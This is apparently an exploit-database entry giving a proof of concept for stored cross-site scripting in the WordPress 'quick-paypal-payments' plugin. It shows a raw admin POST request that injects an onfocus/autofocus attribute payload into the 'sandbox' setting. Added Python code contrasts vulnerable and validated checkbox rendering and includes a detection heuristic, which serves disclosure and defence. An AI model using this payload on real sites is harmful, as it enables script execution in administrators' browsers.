## https://sploitus.com/exploit?id=WPEX-ID:0D247A3D-154E-4DA7-A147-C1C7E1B5E87E
Original request - with sandbox=checked
#####################
POST /wordpress/wp-admin/options-general.php?page=quick-paypal-payments&tab=setup HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/options-general.php?page=quick-paypal-payments&tab=setup
Content-Type: application/x-www-form-urlencoded
Content-Length: 361
Origin: http://localhost
Connection: close
Cookie: XXX
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

email=test%40test.com&qpp_curr=USD&current=test&qpp_currtest=USD&deleteformtest=test&new_form=&new_curr=USD&alternative=test%2C&qpp_clone=Do+not+copy+settings&location=head&sandbox=checked&disable_error=checked&Submit=Update+Settings&_wpnonce=0ad2dfdf9f&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dquick-paypal-payments%26tab%3Dsetup

#####################

POC request - with sandbox=checked%20onfocus%3dalert(document.domain)%20autofocus%3d%20

#####################

POST /wordpress/wp-admin/options-general.php?page=quick-paypal-payments HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/options-general.php?page=quick-paypal-payments
Content-Type: application/x-www-form-urlencoded
Content-Length: 387
Origin: http://localhost
Connection: close
Cookie: XXX
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

email=test%40test.com&current=test%40test.com&qpp_curr=USD&new_form=test&new_curr=USD&alternative=&qpp_clone=Do+not+copy+settings&location=head&sandbox=checked%20onfocus%3dalert(document.domain)%20autofocus%3d%20&disable_error=checked&nostore=checked&Submit=Update+Settings&_wpnonce=0ad2dfdf9f&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dquick-paypal-payments

#####################
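Added example, not part of the original PoC and not the plugin's own source: this Python decodes the `sandbox` field from the two request bodies above and contrasts a hypothetical vulnerable rendering pattern (bare option string echoed into the checkbox tag) with the validate-then-render fix, plus a log-review check for values a checkbox field should never carry.

```python
from urllib.parse import parse_qs

# Form bodies from the two requests above, trimmed to the relevant fields
# (nonce and referer omitted).
ORIGINAL_BODY = "email=test%40test.com&qpp_curr=USD&sandbox=checked&disable_error=checked"
POC_BODY = (
    "email=test%40test.com&qpp_curr=USD&location=head"
    "&sandbox=checked%20onfocus%3dalert(document.domain)%20autofocus%3d%20"
    "&disable_error=checked&nostore=checked"
)

def sandbox_value(body: str) -> str:
    """Return the decoded 'sandbox' field as a form handler would receive it."""
    return parse_qs(body, keep_blank_values=True).get("sandbox", [""])[0]

def render_unsafe(value: str) -> str:
    """Hypothetical vulnerable pattern (assumed, not the plugin's code): the
    stored option string is dropped into the tag as a bare attribute, so any
    whitespace and '=' in it become additional attributes (onfocus, autofocus)."""
    return f'<input type="checkbox" name="sandbox" {value}>'

def is_checked(value: str) -> bool:
    """Input validation: a checkbox setting is a boolean; only the exact token
    'checked' counts, anything else is treated as unchecked."""
    return value == "checked"

def render_safe(value: str) -> str:
    """Hardened form: validate to a bool, then emit fixed markup. This is what
    WordPress's checked() helper does instead of echoing user-controlled text."""
    attr = ' checked="checked"' if is_checked(value) else ""
    return f'<input type="checkbox" name="sandbox"{attr}>'

def looks_like_attribute_injection(value: str) -> bool:
    """Detection heuristic for request-log or WAF review: a checkbox field
    should never contain whitespace, quotes, '=', '<' or '>'."""
    return any(c in value for c in ' \t"\'=<>')

if __name__ == "__main__":
    for name, body in (("original", ORIGINAL_BODY), ("poc", POC_BODY)):
        v = sandbox_value(body)
        print(name, repr(v), "suspicious" if looks_like_attribute_injection(v) else "ok")
        print("  unsafe:", render_unsafe(v))
        print("  safe:  ", render_safe(v))
```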